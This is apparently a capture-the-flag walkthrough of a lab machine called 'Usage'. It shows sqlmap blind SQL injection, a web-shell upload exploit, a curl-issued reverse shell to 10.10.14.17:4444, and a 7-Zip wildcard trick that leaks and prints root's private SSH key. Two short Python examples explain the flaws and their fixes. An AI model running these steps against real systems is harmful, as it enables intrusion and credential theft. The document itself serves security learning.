Proof of Concept

10.129.14.107

Nmap

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Initial Access

Accessing the web service on port 80 redirects to http://usage.htb

80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Edit the /etc/hosts file

┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.14.107    usage.htb

After visiting http://usage.htb, an SQL injection vulnerability was found in the email parameter of the /forget-password endpoint

  • Payload: email=kalionix@gmail.com' and '1'='2

Extract the list of databases with sqlmap

  • information_schema
  • performance_schema
  • usage_blog

┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 --dbs --batch --technique=B --threads=10
 
<SNIP>
 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
18
[06:53:18] [INFO] retrieved: information_schema
[06:53:18] [INFO] retrieving the length of query output
[06:53:18] [INFO] retrieved: 18
[06:53:56] [INFO] retrieved: performance_schema
[06:53:56] [INFO] retrieving the length of query output
[06:53:56] [INFO] retrieved: 10
[06:54:18] [INFO] retrieved: usage_blog
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog
 
[06:54:18] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times
[06:54:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/usage.htb'
 
[*] ending @ 06:54:18 /2026-02-05/

Extract the list of tables in the usage_blog database

┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog --tables --batch --technique=B --threads=10 -v 0
 
<SNIP>
 
Database: usage_blog
[15 tables]
+------------------------+
| admin_menu             |
| admin_operation_log    |
| admin_permissions      |
| admin_role_menu        |
| admin_role_permissions |
| admin_role_users       |
| admin_roles            |
| admin_user_permissions |
| admin_users            |
| blog                   |
| failed_jobs            |
| migrations             |
| password_reset_tokens  |
| personal_access_tokens |
| users                  |
+------------------------+
 

Dump the admin_users table to obtain the administrator password hash

┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog -T admin_users --batch --technique=B --threads=10 -v 0 --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 07:06:08 /2026-02-05/
 
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=IeUU6YdYAotb4xXvIL9RXvbkjp1jQGPif7OSuY5t&email=kalionix@htb.com' AND 3539=(SELECT (CASE WHEN (3539=3539) THEN 3539 ELSE (SELECT 9466 UNION SELECT 9518) END))-- RckG
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name          | avatar  | password                                                     | username | created_at          | updated_at          | remember_token                                               |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1  | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin    | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
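Why the `' and '1'='2` tail gives sqlmap a boolean oracle, and what closes it. Added example, not code from the writeup or from the target application: a minimal SQLite stand-in for the password-reset lookup, where `lookup_vulnerable`, `lookup_safe`, `oracle_demo` and the sample rows are all constructed here (in Laravel the bound form corresponds to the query builder's `where('email', $email)`).

```python
import sqlite3

# Constructed sample rows standing in for the password-reset lookup on usage_blog;
# not data from the box.
SAMPLE_USERS = [("kalionix@gmail.com", "kalionix"), ("editor@usage.htb", "editor")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, email):
    """String-built query: whatever is in `email` becomes part of the SQL text,
    so the trailing ' and '1'='2 rewrites the WHERE clause."""
    sql = f"SELECT name FROM users WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, email):
    """Bound parameter: the driver sends the value separately, so the same
    payload is compared literally against the email column and matches nothing."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE email = ?", (email,))]


def oracle_demo():
    """Return the four lookups that make the blind oracle visible: the vulnerable
    query answers differently for a true and a false tail, the safe one does not."""
    conn = make_db()
    false_tail = "kalionix@gmail.com' and '1'='2"
    true_tail = "kalionix@gmail.com' and '1'='1"
    return {
        "vuln_false": lookup_vulnerable(conn, false_tail),
        "vuln_true": lookup_vulnerable(conn, true_tail),
        "safe_false": lookup_safe(conn, false_tail),
        "safe_true": lookup_safe(conn, true_tail),
    }


if __name__ == "__main__":
    for key, rows in oracle_demo().items():
        print(f"{key:11s} -> {rows}")
```

The differing answers of the vulnerable pair are exactly what sqlmap's `--technique=B` walks character by character; the safe pair is indistinguishable, so there is nothing to infer from.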
 
 

Add the admin domain to /etc/hosts and open the admin page, then log in with the previously obtained credentials (admin/whatever1)

┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.14.107    usage.htb	admin.usage.htb

Check the Laravel version in the admin panel

  • Laravel 10.18.0

This version has a file upload vulnerability (CVE-2023-24249)

Download the PoC

┌──(kali㉿kali)-[~/Usage]
└─$ git clone https://github.com/ldb33/CVE-2023-24249-PoC.git
Cloning into 'CVE-2023-24249-PoC'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (4/4), done.

Running the PoC uploads a web shell

┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ python CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/shell.php

Use the web shell to run a reverse shell command

┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ curl http://admin.usage.htb/uploads/images/shell.php --data-urlencode 'c=bash -c "sh -i >& /dev/tcp/10.10.14.17/4444 0>&1"'

Reverse shell connection established

┌──(kali㉿kali)-[~/Usage]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.14.107] 56108
sh: 0: can't access tty; job control turned off
$

Read user.txt

$ cat user.txt
0baf85aa040a729f07b27184111498fd
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.14.107  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb0:1ad2  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb0:1ad2  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b0:1a:d2  txqueuelen 1000  (Ethernet)
        RX packets 140926  bytes 34253458 (34.2 MB)
        RX errors 0  dropped 1  overruns 0  frame 0
        TX packets 99260  bytes 43958330 (43.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 454565  bytes 50400087 (50.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 454565  bytes 50400087 (50.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral Movement (auth as xander)

Hidden files exist in the dash user's home directory

dash@usage:~$ ls
ls
user.txt
dash@usage:~$ ls -al
ls -al
total 52
drwxr-x--- 6 dash dash 4096 Feb  6 13:36 .
drwxr-xr-x 4 root root 4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root    9 Apr  2  2024 .bash_history -> /dev/null
-rw-r--r-- 1 dash dash 3771 Jan  6  2022 .bashrc
drwx------ 3 dash dash 4096 Aug  7  2023 .cache
drwxrwxr-x 4 dash dash 4096 Aug 20  2023 .config
drwxrwxr-x 3 dash dash 4096 Aug  7  2023 .local
-rw-r--r-- 1 dash dash   32 Oct 26  2023 .monit.id
-rw-r--r-- 1 dash dash    5 Feb  6 13:36 .monit.pid
-rw------- 1 dash dash 1192 Feb  6 13:36 .monit.state
-rwx------ 1 dash dash  707 Oct 26  2023 .monitrc
-rw-r--r-- 1 dash dash  807 Jan  6  2022 .profile
drwx------ 2 dash dash 4096 Aug 24  2023 .ssh
-rw-r----- 1 root dash   33 Feb  6 13:27 user.txt

Password found in the .monitrc file

  • 3nc0d3d_pa$$w0rd

dash@usage:~$ cat .monitrc
cat .monitrc
#Monitoring Interval in Seconds
set daemon  60
 
#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd
 
#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
    if cpu > 80% for 2 cycles then alert
 
 
#System Monitoring
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
        if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert
 
check filesystem rootfs with path /
       if space usage > 80% then alert

User xander has shell access

dash@usage:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<SNIP>
xander:x:1001:1001::/home/xander:/bin/bash
clamav:x:115:121::/var/lib/clamav:/bin/false
_laurel:x:998:997::/var/log/laurel:/bin/false

SSH login as xander succeeds with the previously obtained password

┌──(kali㉿kali)-[~/Usage]
└─$ sshpass -p '3nc0d3d_pa$$w0rd' ssh xander@10.129.14.107
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
  System information as of Fri Feb  6 01:39:44 PM UTC 2026
 
  System load:           0.265625
  Usage of /:            64.9% of 6.53GB
  Memory usage:          20%
  Swap usage:            0%
  Processes:             237
  Users logged in:       0
  IPv4 address for eth0: 10.129.14.107
  IPv6 address for eth0: dead:beef::250:56ff:feb0:a2df
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Fri Feb  6 13:39:47 2026 from 10.10.14.17
xander@usage:~$

Privilege Escalation

Check sudo privileges

  • The /usr/bin/usage_management binary can be run as root

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management

The binary has three functions, which behave as follows:

    1. Project backup
    2. MySQL data backup
    3. Reset admin password

xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
 
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor                 (A00F11),ASM,AES-NI)
 
Scanning the drive:
2984 folders, 17949 files, 114774052 bytes (110 MiB)
 
Creating archive: /var/backups/project.zip
 
Items to compress: 20933
 
 
Files read from disk: 17949
Archive size: 54861362 bytes (53 MiB)
Everything is Ok
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 2
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 3
Password has been reset.

Analyzing the usage_management binary with strings suggests it uses the 7za command to compress all files in the /var/www/html directory

xander@usage:~$ cat usage_management_strings.txt
/lib64/ld-linux-x86-64.so.2
chdir
__cxa_finalize
__libc_start_main
puts
system
__isoc99_scanf
perror
printf
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
<SNIP>

Obtain root's OpenSSH private key using the 7z wildcard vulnerability

xander@usage:~$ cd /var/www/html
xander@usage:/var/www/html$ touch @id_rsa
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa id_rsa
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
 
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor                 (A00F11),ASM,AES-NI)
 
Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54861838
 
Scanning the drive:
 
<SNIP>
Files read from disk: 17950
Archive size: 54861979 bytes (53 MiB)
 
Scan WARNINGS for files and folders:
 
-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
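A pre-backup check for the two conditions the `7za a ... -snl -- *` invocation trips over: a file name starting with `@`, which 7-Zip reads as a list file and echoes line by line in the "No more files" warnings, and a symlink that resolves outside the web root. Added example, not code from the writeup or the box; `backup_dir_hazards`, `build_sample_tree` and `safe_to_backup` are hypothetical names, and the sample tree is constructed in a temp dir to mirror the state shown above.

```python
import os
import tempfile


def backup_dir_hazards(root):
    """Walk `root` and return (relative_path, reason) pairs for entries that a
    root-run `7za a ... -snl -- *` in that directory would mishandle:
    - names beginning with '@', which 7-Zip expands as list files;
    - symlinks whose target resolves outside `root`."""
    root = os.path.realpath(root)
    hazards = []
    for dirpath, dirnames, filenames in os.walk(root):  # does not follow symlinks
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.startswith("@"):
                hazards.append((rel, "list-file name"))
            if os.path.islink(full):
                target = os.path.realpath(full)  # resolves even if dangling
                if os.path.commonpath([root, target]) != root:
                    hazards.append((rel, f"symlink escapes root -> {target}"))
    return hazards


def build_sample_tree():
    """Constructed replica of the writeup's /var/www/html state, in a temp dir."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "public"))
    open(os.path.join(base, "public", "index.php"), "w").close()
    open(os.path.join(base, "@id_rsa"), "w").close()                # list-file trigger
    os.symlink("/root/.ssh/id_rsa", os.path.join(base, "id_rsa"))   # points outside the tree
    os.symlink("public", os.path.join(base, "www"))                 # in-tree link, harmless
    return base


def safe_to_backup(root):
    """True only when no hazards were found; the backup job should refuse otherwise."""
    return not backup_dir_hazards(root)


if __name__ == "__main__":
    base = build_sample_tree()
    for rel, why in backup_dir_hazards(base):
        print(f"{rel}: {why}")
    print("safe:", safe_to_backup(base))
```

The check only narrows the window; the durable fix is not to run the archiver as root over a glob in a directory a lower-privileged user can write to.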

SSH in with the obtained OpenSSH private key

┌──(kali㉿kali)-[~/Usage]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
-----END OPENSSH PRIVATE KEY-----
 
┌──(kali㉿kali)-[~/Usage]
└─$ ssh root@10.129.14.107 -i id_rsa
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
  System information as of Fri Feb  6 02:26:30 PM UTC 2026
 
  System load:           0.0390625
  Usage of /:            65.7% of 6.53GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             241
  Users logged in:       1
  IPv4 address for eth0: 10.129.14.107
  IPv6 address for eth0: dead:beef::250:56ff:feb0:a2df
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Mon Apr  8 13:17:47 2024 from 10.10.14.40
root@usage:~#

Read root.txt

root@usage:~# cat root.txt
6e50ef4673969d3b69d461280263ecb7
root@usage:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.14.107  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb0:a2df  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb0:a2df  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b0:a2:df  txqueuelen 1000  (Ethernet)
        RX packets 14973  bytes 1055646 (1.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2932  bytes 438852 (438.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2365  bytes 264609 (264.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2365  bytes 264609 (264.6 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0